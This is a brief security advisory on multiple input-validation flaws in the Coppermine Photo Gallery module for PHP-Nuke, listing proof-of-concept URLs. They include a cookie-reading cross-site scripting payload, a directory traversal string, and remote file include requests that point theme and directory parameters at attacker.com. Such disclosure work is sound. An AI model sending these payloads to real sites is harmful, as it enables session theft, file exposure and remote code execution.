|
Coppermine Photo Gallery Multiple Input Validation Vulnerabilities
No exploits are required to leverage these issues. The following proof-of-concept exploits have been provided: Cross-site scripting proof of concept: http://www.example.com/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert(document.cookie);> Arbitrary directory browsing: http://www.example.com/nuke72/modules.php?name=coppermine&file=searchnew&startdir=../.. Remote file include: http://www.example.com/nuke69j1/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://attacker.com http://www.example.com/nuke72/modules/coppermine/themes/default/theme.php?THEME_DIR=http://attacker.com http://www.example.com/nuke72/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://attacker.com http://www.example.com/nuke72/modules/coppermine/themes/maze/theme.php?THEME_DIR=http://attacker.com |
|
|
Privacy Statement |